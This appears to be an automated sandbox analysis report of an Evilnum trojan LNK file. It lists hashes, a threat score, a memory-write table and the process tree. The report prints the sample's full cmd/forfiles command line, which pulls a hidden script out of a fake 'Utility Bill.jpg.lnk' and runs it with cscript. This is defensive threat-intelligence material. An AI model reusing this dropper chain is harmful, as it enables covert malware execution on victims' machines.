evilnum | 4e734713911d2bcb1ba9da2752e529387fe176aa2da0c043593c412e7dec1ade

Analysis

Target

4e734713911d2bcb1ba9da2752e529387fe176aa2da0c043593c412e7dec1ade.lnk
Size

88KB
MD5

3d0836ddc60ac65f9c43cc6732e5317c
SHA1

910382e02738661583813d212904742390c5008a
SHA256

4e734713911d2bcb1ba9da2752e529387fe176aa2da0c043593c412e7dec1ade
SHA512

94f6374c5fc0d650eb8526efc86ee263dc7286fe47c6c8aacc04b42ab0dcc8994337df32c1f9fdae5c724941be0fee164aa11dd001cb96a71d3d9fe0553f2144

Score

10^/10

evilnum trojan

Evilnum
A malware family with multiple components distributed through LNK files.
trojan evilnum
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 3348 wrote to memory of 1020	3348	cmd.exe	69
PID 3348 wrote to memory of 1020	3348	cmd.exe	69
PID 1020 wrote to memory of 3092	1020	cmd.exe	70
PID 1020 wrote to memory of 3092	1020	cmd.exe	70
PID 1020 wrote to memory of 1316	1020	cmd.exe	71
PID 1020 wrote to memory of 1316	1020	cmd.exe	71
PID 1020 wrote to memory of 1328	1020	cmd.exe	72
PID 1020 wrote to memory of 1328	1020	cmd.exe	72
PID 1020 wrote to memory of 1188	1020	cmd.exe	73
PID 1020 wrote to memory of 1188	1020	cmd.exe	73
PID 1020 wrote to memory of 656	1020	cmd.exe	74
PID 1020 wrote to memory of 656	1020	cmd.exe	74

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\4e734713911d2bcb1ba9da2752e529387fe176aa2da0c043593c412e7dec1ade.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:3348
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c path=C:\Windows\system32&&move "Utility Bill.jpg.lnk " "C:\Users\Admin\AppData\Local\Temp\1.lnk"&forfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "Util*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"&type "C:\Users\Admin\AppData\Local\Temp\1.lnk"|find "TRU4">"C:\Users\Admin\AppData\Local\Temp\0.js"|rd a||cSCripT "C:\Users\Admin\AppData\Local\Temp\0.js"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1020
- - C:\Windows\system32\forfiles.exe
    forfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "Util*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"
    3⤵
    PID:3092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\Admin\AppData\Local\Temp\1.lnk""
    3⤵
    PID:1316
- - C:\Windows\system32\find.exe
    find "TRU4"
    3⤵
    PID:1328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" rd a"
    3⤵
    PID:1188
- - C:\Windows\system32\cscript.exe
    cSCripT "C:\Users\Admin\AppData\Local\Temp\0.js"
    3⤵
    PID:656

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact